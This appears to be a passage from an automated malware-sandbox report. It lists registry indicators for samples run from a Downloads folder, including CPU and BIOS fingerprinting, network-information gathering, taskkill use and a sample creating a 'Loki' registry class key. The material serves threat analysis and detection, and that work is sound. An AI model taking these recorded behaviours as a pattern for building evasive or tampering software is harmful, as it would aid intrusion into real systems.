| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895701868183330" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\L1041" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 040000000500000003000000020000000100000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\NodeSlot = "18" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{D6D9E004-CD87-442B-9D57-5E0AEB4F6F72}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\5 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech SW Voice Activation - Japanese (Japan)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.html | C:\Windows\SysWOW64\cmd.exe | N/A |
